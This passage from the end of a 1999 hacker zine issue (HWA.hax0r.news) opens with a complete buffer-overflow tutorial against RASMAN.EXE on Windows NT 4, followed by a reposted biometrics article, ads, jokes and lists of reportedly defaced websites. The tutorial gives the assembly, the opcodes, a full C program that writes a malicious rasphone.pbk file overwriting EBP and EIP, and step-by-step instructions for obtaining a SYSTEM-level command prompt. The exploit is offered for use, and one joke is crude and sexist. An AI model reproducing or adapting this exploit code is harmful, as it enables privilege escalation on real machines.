to find that DLL. When a DLL is loaded into a process' address space it will always be found at that base address and the functions it exports can then be found at an entry point within the base. The system ( ) function is exported msvcrt.dll (the Microsoft Visual C++ Runtime library) which has base address of 0x78000000 and system ( ) entry point can be found at 000208C3 (in version 5.00.7303 of msvcrt.dll anyway) meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of the command to run (cmd.exe) and and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. Nulls can really complicate issues. To find out what the stack needs to look like when a normal program calls system("cmd.exe"); we need to write one that does and debug it. We'll need to get our arbitary code to build a duplicate image of the stack as it appears in our program just before system ( ) is called. Below is the source of our program. Compile and link it with kernel32.lib then run and debug it. #include #include typedef void (*MYPROC)(LPTSTR); int main() { HINSTANCE LibHandle; MYPROC ProcAdd; char dllbuf[11] = "msvcrt.dll"; char sysbuf[7] = "system"; char cmdbuf[8] = "cmd.exe"; LibHandle = LoadLibrary(dllbuf); ProcAdd = (MYPROC) GetProcAddress(LibHandle, sysbuf); (ProcAdd) (cmdbuf); return 0; } On debugging and examining the stack prior to calling system ( ) [(ProcAdd)(cmdbuf); in the above code] we see that starting from the top of the stack we find the address of the "c" of cmd.exe, then the address of where the system ( ) function can be found, the null terminated cmd.exe string and a few other things that are too important. So to emulate this we need the null terminated "cmd.exe"string in the stack, then the address of the system function and then the address which points to our "cmd.exe" string. Below is a picture of what we need the stack to look like before calling system ( ) -------------------- ESP (Top of the Stack) XX -------------------- XX -------------------- XX -------------------- XX -------------------- C3 -------------------- 08 -------------------- 02 -------------------- 78 -------------------- 63 c -------------------- 6D m -------------------- 64 d -------------------- 2E . -------------------- 65 e -------------------- 78 x -------------------- 65 e -------------------- 00 -------------------- EBP (Bottom of the stack) where the top 4 XXs are the address of "c". We don't need to hardcode this address into our exploit string because we can use the EBP as a reference - remember it is the base pointer. Later on you'll see that we load the address where the first byte of our cmd.exe string can be found into a register using the EBP as a reference point. Writing the Assembly. This is what we need the stack to look like when we call system ( ). How do we get it there? We have to build it ourselves with our opcodes - we can't just put it in our exploit string because as you can see there are nulls in it and we can't have nulls. Because we have to build it this is where knowing at least a little assembly language comes in handy. The first thing we need to do is set the ESP to an address we can use for our stack. (Remember the ESP points to the top of the stack.) To do this we use: mov esp, ebp This moves the EBP into the ESP - rember we overwrite the EBP as well as the EIP which is really handy. We'll overwrite the EBP with an address we know we can write to - we will use 0x015DF124. Consequently the ESP, after we move the EBP into it, the top of the stack will be found at 0x015DF124. We then want to push EBP onto the stack. This is our return address. push ebp This has the effect of pushing the ESP down 4 bytes and so ESP is now 0x015DF120. After this we then want to move the ESP into the EBP: mov ebp,esp This completes our own procedure prologue. With this done we can go about building the stack the way we want it to look The next thing we need to do is get some nulls onto the stack. We need some nulls because we need to have our cmd.exe string terminated with a null. Even though the cmd.exe string isn't there yet it will be but we have to do things in reverse order. Before we can push some nulls onto the stack we need to make some. We do this by xoring a register with itself- we'll use the EDI register. xor edi,edi This will set the EDI to 00000000 and then we push it onto the stack using push edi This also has the added effect of pushing out our ESP to 0x015DF11C. But "cmd.exe" is 7 bytes long and we only have room for 4 bytes so far and don't forget we need a null tacked on the end of our string so we need to push the ESP out another 4 bytes to give us a total of 8 bytes of space between the ESP and the EBP. We could push the edi again, but for varitey we'll just sub the ESP by 4. sub esp,04h Our ESP is now 0x015DF118 and our EBP is 0x015DF120. Our next job is to get cmd.exe written to the stack. To do this we'll use the EBP as a reference point and move 63, the hex value for a small "c" into the address offset from the EBP minus 8. mov byte ptr [ebp-08h],63h We do the same for the "m", the "d", the ".", the first"e", the "x" and the final "e". mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr [ebp-02h],65h Our stack now looks like this: ----------------------------------------------------- ESP 63 c ----------------------------------------------------- 6D m ----------------------------------------------------- 64 d ----------------------------------------------------- 2E . ----------------------------------------------------- 65 e ----------------------------------------------------- 78 x ----------------------------------------------------- 65 e ----------------------------------------------------- 00 ----------------------------------------------------- EBP All that we need to do now is put the address of system( ) onto the stack and the pointer to our cmd.exe string on top of that - once that is done we'll call the system ( ) function. We know that the system( ) function is exported at address 0x780208C3 so we'll move this into a register and then push it onto the stack: mov eax, 0x780208C3 push eax We then want to put the address of the "c" of our "cmd.exe" string onto the stack. We know that the "c" can be found eight bytes away from our EBP so we'll load the address 8 bytes less than the EBP into a register: lea eax,[ebp-08h] The EAX register now holds the address where our cmd.exe string begins. We then want to push this onto the stack: push eax With this done our stack is built and we are ready to call system ( ) but we don't call it directly - again we use the indirection of using our EBP as a reference point and call address found at EBP minus 12 (or 0C in hex): call dword ptr [ebp-0ch] Here is all our code strung together. mov esp,ebp push ebp mov ebp,esp xor edi,edi push edi sub esp,04h mov byte ptr [ebp-08h],63h mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr [ebp-02h],65h mov eax, 0x780208C3 push eax lea eax,[ebp-08h] push eax call dword ptr [ebp-0ch] The next thing to do is test this assembly to see if it works so we need to write a program that uses the __asm ( ) function. The __asm ( ) function takes Assembly language and incorporates it into a C program. As we are calling system ( ) which is exported by msvcrt.dll we'll need to load that- we use the LoadLibrary ( ) function to do this - otherwise when run our code would fail: #include #include void main() { LoadLibrary("msvcrt.dll"); __asm { mov esp,ebp push ebp mov ebp,esp xor edi,edi push edi sub esp,04h mov byte ptr [ebp-08h],63h mov byte ptr [ebp-07h],6Dh mov byte ptr [ebp-06h],64h mov byte ptr [ebp-05h],2Eh mov byte ptr [ebp-04h],65h mov byte ptr [ebp-03h],78h mov byte ptr [ebp-02h],65h mov eax, 0x780208C3 push eax lea eax,[ebp-08h] push eax call dword ptr [ebp-0ch] } } compile and link with kernel32.lib. When run this should start a new instance of the Command Interperter, cmd.exe. There will be an access violation however when you exit that instance in the program though - we've messed around with the stack and haven't clean up after ourselves. That's it then - that's our arbritary code and all we need to do now is put this into the rasphone.pbk file as our telephone number. Before we can do that though, we need to get the op-codes for the above assembly. This is relatively easy - just debug the program you've just compiled and get the opcodes from there. You should get "8B E5" for "mov esp,ebp" and "55" for "push ebp" etc etc. Once we have all the opcodes we need to put these in our "telephone number". But we can't type the opcodes very easily in Notepad. The easiest thing to do is write another program that creates a rasphone.pbk file with the telephone number loaded with our arbitary code. Below is an example of such a program with comments: /* This program produces a rasphone.pbk file that will cause and exploit a buffer overrun in */ /* RASMAN.EXE - it will drop the user into a Command Prompt started by the system. */ /* It operates by re-writing the EIP and pointing it back into our exploit string which calls */ /* the system() function exported at address 0x780208C3 by msvcrt.dll (ver 5.00.7303) on */ /* NT Server 4 (SP3 & 4). Look at the version of msvcrt.dll and change buffer[109] to buffer[112]*/ /* in this code to suit your version. msvcrt.dll is already loaded in memory - it is used by */ /* RASMAN.exe. Developed by David Litchfield (mnemonix@globalnet.co.uk ) */ #include #include int main (int argc, char *argv[]) { FILE *fd; int count=0; char buffer[1024]; /* Make room for our stack so we are not overwriting anything we haven't */ /* already overwritten. Fill this space with nops */ while (count < 37) { buffer[count]=0x90; count ++; } /* Our code starts at buffer[37] - we point our EIP to here @ address 0x015DF126 */ /* We build our own little stack here */ /* mov esp,ebp */ buffer[37]=0x8B; buffer[38]=0xE5; /*push ebp*/ buffer[39]=0x55; /* mov ebp,esp */ buffer[40]=0x8B; buffer[41]=0xEC; /* This completes our negotiation */ /* We need some nulls */ /* xor edi,edi */ buffer[42]=0x33; buffer[43]=0xFF; /* Now we begin placing stuff on our stack */ /* Ignore this NOP */ buffer[44]=0x90; /*push edi */ buffer[45]=0x57; /* sub esp,4 */ buffer[46]=0x83; buffer[47]=0xEC; buffer[48]=0x04; /* When the system() function is called you ask it to start a program or command */ /* eg system("dir c:\\"); would give you a directory listing of the c drive */ /* The system () function spawns whatever is defined as the COMSPEC environment */ /* variable - usually "c:\winnt\system32\cmd.exe" in NT with a "/c" parameter - in */ /* other words after running the command the cmd.exe process will exit. However, running */ /* system ("cmd.exe") will cause the cmd.exe launched by the system function to spawn */ /* another command prompt - one which won't go away on us. This is what we're going to do here*/ /* write c of cmd.exe to (EBP - 8) which happens to be the ESP */ /* mov byte ptr [ebp-08h],63h */ buffer[49]=0xC6; buffer[50]=0x45; buffer[51]=0xF8; buffer[52]=0x63; /* write the m to (EBP-7)*/ /* mov byte ptr [ebp-07h],6Dh */ buffer[53]=0xC6; buffer[54]=0x45; buffer[55]=0xF9; buffer[56]=0x6D; /* write the d to (EBP-6)*/ /* mov byte ptr [ebp-06h],64h */ buffer[57]=0xC6; buffer[58]=0x45; buffer[59]=0xFA; buffer[60]=0x64; /* write the . to (EBP-5)*/ /* mov byte ptr [ebp-05h],2Eh */ buffer[61]=0xC6; buffer[62]=0x45; buffer[63]=0xFB; buffer[64]=0x2E; /* write the first e to (EBP-4)*/ /* mov byte ptr [ebp-04h],65h */ buffer[65]=0xC6; buffer[66]=0x45; buffer[67]=0xFC; buffer[68]=0x65; /* write the x to (EBP-3)*/ /* mov byte ptr [ebp-03h],78h */ buffer[69]=0xC6; buffer[70]=0x45; buffer[71]=0xFD; buffer[72]=0x78; /*write the second e to (EBP-2)*/ /* mov byte ptr [ebp-02h],65h */ buffer[73]=0xC6; buffer[74]=0x45; buffer[75]=0xFE; buffer[76]=0x65; /* If the version of msvcrt.dll is 5.00.7303 system is exported at 0x780208C3 */ /* Use QuickView to get the entry point for system() if you have a different */ /* version of msvcrt.dll and change these bytes accordingly */ /* mov eax, 0x780208C3 */ buffer[77]=0xB8; buffer[78]=0xC3; buffer[79]=0x08; buffer[80]=0x02; buffer[81]=0x78; /* Push this onto the stack */ /* push eax */ buffer[82]=0x50; /* now we load the address of our pointer to the cmd.exe string into EAX */ /* lea eax,[ebp-08h]*/ buffer[83]=0x8D; buffer[84]=0x45; buffer[85]=0xF8; /* and then push it onto the stack */ /*push eax*/ buffer[86]=0x50; /* now we call our system () function - all going well a command prompt will */ /* be started, the parent process being rasman.exe */ /*call dword ptr [ebp-0Ch] */ buffer[87]=0xFF; buffer[88]=0x55; buffer[89]=0xF4; /* fill to our EBP with nops */ count = 90; while (count < 291) { buffer[count]=0x90; count ++; } /* Re-write EBP */ buffer[291]=0x24; buffer[292]=0xF1; buffer[293]=0x5D; buffer[294]=0x01; /* Re-write EIP */ buffer[295]=0x26; buffer[296]=0xF1; buffer[297]=0x5D; buffer[298]=0x01; buffer[299]=0x00; buffer[300]=0x00; /* Print on the screen our exploit string */ printf("%s", buffer); /* Open and create a file called rasphone.pbk */ fd = fopen("rasphone.pbk", "w"); if(fd == NULL) { printf("Operation failed\n"); return 0; } else { fprintf(fd,"[Internet]\n"); fprintf(fd,"Phone Number="); fprintf(fd,"%s",buffer); fprintf(fd,"\n"); } return 0; } When compiled and run this program will create a rasphone.pbk file with one entry called Internet and a phone number loaded with our arbitary code. When RASMAN.EXE opens this file and it uses RasGetDialParams ( ) to get the relevant information and assigns it to a RAS_DIAL_PARAMS structure which contains the character arrays. As you'll have guessed we're overflowing the one that holds the telephone number. Now to test it all. Quite often when trying to exploit buffer overruns you don't get it right the first time - usually due to an oversight or something. The code in this document has been tested on NT Server 4 with SP 3, NT Server 4 with SP 4 and NT Workstation SP 3 all running on a Pentium processor and it works - that's not to say that it will run on your machine though. There could be a number of reasons why it might not, but that is up to you to find out. So any way, let's test it: To be able to get this to work take the following steps: 1) Make a backup copy of your real rasphone.pbk file and then delete the original. The NTFS permissions on this file by default give everybody the Change permission so there shouldn't be a problem with this. 2) Run rasphone (click on Start -> Run -> type rasphone -> OK). You should get a message saying that the phone book is empty and click OK to create a new one. 3) Click OK and make a new entry calling it "Internet". Put in the relevant information needed to be able to dial into your ISP. Once the entry is complete dial it. 4) Once connected open Outlook Express and download your e-mails. The reason for doing this is because this will create a Registry entry for your mail server's domain name and associate it as an autodialable address. If Outlook Express' connection is dial up change it to a LAN connection - this'll be under the mail account's properties. 5) Hangup and close Outlook Express. 6) Copy the delete the new rasphone.pbk and replace it with your one made from the above code. 7) Open Outlook Express. Because your not connected to the Internet RASMAN should automatically dial for you, read in from the Registry the autodail information then open rasphone.pbk, fill its buffers and overflow. Within about eight seconds or so a Command Prompt window will open. This Command Prompt has SYSTEM privileges. That's it - we've exploited a buffer overrun and executed our arbitary code. @HWA 55.0 More on biometrics ~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ ZDNET ON BIOMETRICS by BHZ, Thursday 20th May 1999 on 10.15 pm CET Biometric security is well established now. Quick note: that this branch of computer security where you don't need passwords but you could be recognized by your thumb, eye or voice. ZdNet published an article about current biometric products , prices and standards. Read the article below. http://www.zdnet.com/anchordesk/story/story_3395.html?chkpt=ad1qsfp Berst Alert WEDNESDAY, MAY 19, 1999 The Biometrics Revolution Jesse Berst, Editorial Director ZDNet AnchorDesk Our ever-frugal Tech Director Jon DeKeles strolled into the office the other day and offered to buy everyone lunch. After I picked myself up off the floor, I demanded to see his ID. Some alien creature had obviously taken control of his body -- lab coat and all. If AnchorDesk had the latest biometric technology, I wouldn't ask for ID. I'd have voice-authentication software to compare Jon's voice against an earlier voice-capture. Or I'd put him in front of a camera lens to scan his iris and match it against iris codes in the database. The rapidly evolving science of biometrics uses unique physical attributes -- voice, fingerprint, iris -- to identify users. Biometric security products exist now. But it will be another year at least before we start realizing their full potential. Here's a look at where the biometric roadmap will take us: WHERE WE ARE Biometrics have been around for decades. The public sector -- particularly military and law enforcement -- were the early adopters. Today public agencies use biometrics for such things as preventing welfare fraud and determining eligibility for health care benefits. But usage outside of government remains spotty, particularly in the enterprise, for several reasons: Steep prices. Costs range from less than $100 for a basic reading device to thousands for a fully integrated access system. But Gartner Group research director Jackie Fenn says costs are dropping dramatically. That will be key to widespread adoption. Lack of standards. Integrating biometric systems with mainstream PC technology is a headache IT execs don't need. But there's movement toward standards among consortiums such as BioAPI. (See link below.) Early failures. Vendors admit fingerprint sensor tools introduced last year weren't as robust as they needed to be -- a black mark on a fledgling industry. WHERE WE'RE GOING Government will continue to be a hot market for biometric security, but experts see huge potential in the financial community and the medical industry. The security issues that haunt corporate IT and ecommerce make them obvious markets for biometrics too. (For some fascinating biometric applications, see today's Special Report.) Here's how the Gartner Group predicts the biometric emergence will happen: - 2000: Full-scale rollout of iris recognition for bank tellers and ATMs - 2001: Fingerprint recognition becomes the remote access tool of choice for corporations that adopt biometrics - 2002: Iris recognition gains lead over fingerprints for installations serving many users What's your take on biometrics? Does the technology look like a long-term answer to our security woes? Use TalkBack to tell me what you think. Or jump to my Berst Alert forum and hash it out with other readers. Too bad it's such a slow road to mainstream biometrics. Because some days I really do think AnchorDesk has been possessed. No sooner had Jon offered to buy everyone lunch, then our GenX associate editor Nicci Noteboom asked if I wanted her to stay late and help me with a project. @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* The Top Ten Signs Your Co-worker Is a Computer Hacker. 10: You ticked him off once and your next phone bill was for $20,000. 9: He's won the Publisher's Clearing House sweepstakes 3 years running. 8: When asked for his phone number, he gives it in hex. 7: Seems strangely calm whenever the office LAN goes down. 6: Somehow gets HBO on his PC at work. 5: Mumbled, "Oh, puh-leeez" 95 times during the movie "The Net". 4: Massive 401k contribution made in half-cent increments. 3: His video dating profile lists "public-key encryption" among turn-ons. 2: When his computer starts up, you hear, "Good Morning, Mr. President". 1: You hear him murmur, "Let's see you use that Visa now, Professor I-Don't-Give-A's-In-Computer-Science!" Most infamous things people do on their computer http://www.vmnet.net/infamous.html These are some of the better 'computer moments' we have found on the net. If you would like to add something just fill out the form below. Our company used to sell time on our computers so very small companies that couldn't afford computers at the time could do their bookkeeping, etc. One day, a new woman came in. She fumbled about for about 10 minutes but I paid no attention to her. Finally she came out and grumbled something about how the computer wouldn't turn on. I grilled her with the usual obvious questions: Did you turn the switch on? Did you plug it in? Did you turn on the switch on the power strip? She was sure she had done everything right. I was sure she neglected to plug one of the power cords into the power strip. So, I went to investigate and she was *RIGHT*, she *HAD* plugged everything in to the power strip... including the power strip's own power cord - talk about a ground loop! A woman called the shop where she had bought a PC and complained that it didn't work properly: Every time she switched it on the screen was filled with characters. Two technicians were sent out and were met by a woman with tits about twice the size of Dolly Parton's and glasses about two centimeters thick. They asked her to switch on the computer. This she did, and then leaned over the keyboard to read what was on the screen... The problem was quickly solved. A tech support guy once told me that he got a call from someone saying that the computer screen just went black and the computer wouldn't respond at all. The tech guy (starting with the obvious) asked the guy if the computer was still plugged in that maybe his foot had knocked the plug out of the socket. The guy on the other end of the phone said to hold on that he would be back in a minute with a flashlight because the electricity had just gone out in his building and he couldn't see under the desk without the lights.... I was trying to teach this sales person (for automated entrance system [they made gates]) how to enter his letters into Word Perfect. I told him to select Word Perfect from his menu and when he did it gave him the opening screen which said, "Press any key to continue..." He looked at the keyboard for awhile then asked me, "Where is the 'any' key?". There is the classic one (which I hope is an urban myth) of the secretary working in an accounting firm who is told to make back up copies of the discs every night. Every night she carfully collected together all the discs and took them away to copy them. After six months the hard disc crashed but no-one was worried because they had backups, until the secretary brought in the huge pile of paper with a nice photocopied disc on each! A user called the PC Support line of the university having trouble with her Mac. It was handed off to one of the Mac guys... "What seems to be the problem?" "It's not working." Eyes roll. "What's not working?" "My Mac." - Five minutes of drawing the problem out of the woman deleted - Okay, to access the files on the disk click the mouse on the picture of the disk." Pause. Nothing happened. I told you, I've already tried this." Support guy makes as if he is strangling the phone. "Okay, do it again. Is the mouse moving?" "Yep." "On the screen?" "Yep." "Now click twice on the picture of the disk." Pause and the consultant hears the two clicks again. "Nothing." "Maam, double-click once more for me." Clink-clink. "Maam, are you hitting the screen with your mouse.......?" While I was working in a placement office at the University, we helped students write their resumes on the computer. A student came up to me and said he had problems reading the disk. I asked him to show it to me so I could see if I could recover the files, "Sure." he said, an took the disk (5 1/4" floppy) out of his pocket and unfolded it. Another time, while working at a computer store, somebody who bought his computer from us was having trouble with one of his disks. The man was living in another city, so I asked him to send me a copy of the disk, and I would take a look at it. A few days later, an envelope arrived for me, it contained a "photocopy" of the front and back side of the disk @HWA SITE.1 @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... From HNN rumours section, http://www.hackernews.com/ , another busy weekend for some folks... May 17th contributed by Anonymous Cracked http://www.chaoticmedia.com http://assholes.hypermart.net http://cct.georgetown.edu http://cim.ucdavis.edu http://heed.unh.edu http://www.areahomes.com http://www.basic.nwu.edu http://www.shulin.gov.tw http://www.starlette.org http://www.utm.mx http://www.csos.net http://www.jobscape.be http://www.wosc.osshe.edu http://classdb.unl.edu http://hesweb1.med.virginia.edu http://mefisto.toi.tarman.pl http://uhec.udmercy.edu http://www.cpst.hu http://www.euro-line.hu http://www.gima.be http://www.iti-inkjet.com http://www.onestoprealty.com http://www.randallphillipshomes.com http://www.tele-base.com/ http://www.renewableresources.com http://www.spouses.net http://www.thehosemobile.com http://e-net.net http://www.funmax.com http://www.csos.net May 18th From HNN rumours section, http://www.hackernews.com/ contributed by Anonymous Cracked The following sites have been reported to HNN as being cracked. http://ftp.meteofa.mil.ar http://cae.artear.com.ar http://www.gima.be http://www.naturalbornassholes.com http://www.hbo-latinamerica.com http://www.gaminginvasion.com http://cbpa.louisville.edu http://cob-distance02.colorado.edu http://pindar.ilt.columbia.edu http://shadowflax.cs.byu.edu http://www.actionbid.com http://www.enoch.com http://www.gis.dk http://alspubs.lbl.gov http://www.ncaur.usda.gov http://www.phonephreaks.org May 19th From HNN's rumours section http://www.hackernews.com/ contributed by Anonymous Cracked The following have been reported as Cracked http://bell.shops.bnl.gov http://bernoulli.gsfc.nasa.gov http://info.law.arizona.edu http://htc149.hi-techcolor.com http://secure.wcoil.com http://www.synergetics.be http://www.bewakers.com http://www.firewallers.com http://www.wave.be http://www.senderex.com http://data.accu-find.com http://assets-www.idss.ida.org http://proxy.tpg.gov.tw http://raptor.jcu.edu.au http://training.clemson.edu http://www.theargon.com http://www.khakiman.com http://www.tyan.com May 20th From HNN's rumours section http://www.hackernews.com/ contributed by Anonymous Cracked The following sites have been reported to HNN as cracked http://www.state.vt.us http://www.isci-cuautla.com.mx http://www.nitro7.com http://www.beaver.edu http://isgdevel.sbt.com http://www.bdsm.cz http://(www.ies.ncsu.ed http://bell.shops.bnl.gov http://bernoulli.gsfc.nasa.gov http://info.law.arizona.edu http://htc149.hi-techcolor.com http://secure.wcoil.com May 21st contributed by Anonymous Cracked The following have been reported to HNN as Cracked http://uc.uww.edu http://www.assassination.org http://www.compdisk.com http://askiris.toshiba.com http://actinic.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]